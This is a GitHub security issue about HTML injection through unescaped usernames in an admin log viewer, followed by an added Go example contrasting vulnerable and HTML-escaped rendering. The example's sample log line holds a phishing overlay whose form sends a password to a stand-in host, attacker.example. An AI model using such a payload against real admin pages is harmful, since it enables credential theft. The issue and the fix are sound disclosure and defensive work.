
Security Vulnerability - Content Injection #22

Closed
benmap-brex opened this issue Feb 11, 2020 · 7 comments
Labels
bug Something isn't working

Comments

@benmap-brex

benmap-brex commented Feb 11, 2020

Impact:
Medium
(remotely exploitable with non-default configuration)

CVSS v3.1 Vector:
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

The admin panel logs pages are vulnerable to HTML injection. An attacker can craft a phishing page using HTML + CSS and trick admins who view the page into disclosing their credentials. CSP prevents JS execution, but JS execution isn’t necessary to do damage.

[screenshot: keymaster_html_injection]

@benmap-brex benmap-brex changed the title Security Vulnerability - Content Injection - Medium Risk Security Vulnerability - Content Injection Feb 11, 2020
@cviecco
Contributor

cviecco commented Feb 11, 2020

@benmap-brex: I am unable to follow how this can happen on default configuration (no logs exposed). Can you please elaborate?

@benmap-brex
Author

Hey, not sure what the default config is, but usernames are not HTML encoded when reflected into the /logs endpoint on port 6920. If an attacker POSTs to the login endpoint with a username containing HTML it will show up in the logs, as shown in the screenshot above.

@cviecco
Contributor

cviecco commented Feb 12, 2020

I agree with you... @rgooch : this is what happens when templates are not used. Since this happens only when public logs are enabled (non default) I am accepting this as bug, but making this a medium issue.

@cviecco cviecco added the bug Something isn't working label Feb 12, 2020
@cviecco
Contributor

cviecco commented Feb 12, 2020

I updated the impact and accepted this as bug

@benmap-brex
Author

Thanks for checking into this! Again, didn't know it wasn't a default config 👍

@rgooch
Member

rgooch commented Feb 13, 2020

Given this was exposed with a non-default configuration, is there anything we should/can do here?
@cviecco: I'm not sure what the relevance of templates vs. not using templates is. The /log endpoints dump the contents of the log files and the in-memory log buffer. I don't think the logs should be processed in any way by this endpoint.

@rgooch
Member

rgooch commented Feb 13, 2020

I've merged code (Cloud-Foundations/Dominator#49) which escapes HTML sequences in the logs display. Anyone building from HEAD will have this fix. I think that completes the source code side of this, so closing. Please re-open if you disagree.
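The injection path described in this thread (a login attempt whose username carries HTML, later dumped verbatim by a log-viewing endpoint) and the escaping fix can be reproduced in a few lines. The following is an added, self-contained Go example written for this page; it is not keymaster's or Dominator's code and does not reproduce their log format or handlers. The log lines, the `user=` field layout and the handler names are constructed for illustration. The example renders one constructed log buffer twice, once the way the bug behaves (lines written straight into the HTML response) and once through `html.EscapeString`, which is the class of fix the merged change applies.

```go
package main

import (
	"fmt"
	"html"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed sample log buffer (hypothetical format, not keymaster's). The second
// line is what a failed login whose username field contains HTML would leave behind:
// a full-page overlay with a fake login form, no JavaScript required, so a CSP that
// only blocks script execution does not stop it.
var sampleLog = []string{
	"2020/02/11 10:00:01 login failed for user=alice",
	`2020/02/11 10:00:02 login failed for user=<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff"><form action="https://attacker.example/steal"><input name="password"></form></div>`,
}

// renderLogsUnescaped reproduces the bug: each log line is copied into an HTML
// page exactly as it was logged, so markup in the line becomes markup in the page.
func renderLogsUnescaped(w http.ResponseWriter, lines []string) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	fmt.Fprint(w, "<html><body><pre>\n")
	for _, l := range lines {
		fmt.Fprintln(w, l)
	}
	fmt.Fprint(w, "</pre></body></html>\n")
}

// renderLogsEscaped is the hardened form: every line passes through
// html.EscapeString, so <, >, &, ' and " arrive in the browser as text, not markup.
func renderLogsEscaped(w http.ResponseWriter, lines []string) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	fmt.Fprint(w, "<html><body><pre>\n")
	for _, l := range lines {
		fmt.Fprintln(w, html.EscapeString(l))
	}
	fmt.Fprint(w, "</pre></body></html>\n")
}

// serve runs a handler against an in-memory ResponseRecorder and returns the body,
// so the check below needs no network listener.
func serve(h func(http.ResponseWriter, []string), lines []string) string {
	rec := httptest.NewRecorder()
	h(rec, lines)
	return rec.Body.String()
}

// ContainsRawTag reports whether the attacker-controlled tags from the log content
// survive into the response unescaped, i.e. whether a browser would render them.
func ContainsRawTag(body string) bool {
	return strings.Contains(body, "<form") || strings.Contains(body, "<div")
}

// RenderVulnerable and RenderFixed expose both renderings for inspection.
func RenderVulnerable() string { return serve(renderLogsUnescaped, sampleLog) }
func RenderFixed() string      { return serve(renderLogsEscaped, sampleLog) }

func main() {
	fmt.Println("vulnerable rendering contains raw injected tag:", ContainsRawTag(RenderVulnerable()))
	fmt.Println("escaped rendering contains raw injected tag:   ", ContainsRawTag(RenderFixed()))
}
```

The check to carry over to a real deployment is the same one the example performs: send a login request whose username contains a distinctive tag, fetch the log view as an admin would, and confirm the tag comes back as `&lt;...&gt;` rather than as markup. Escaping at the point of display is the right layer for this, since the log files themselves should keep the attacker's input verbatim for forensic purposes.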
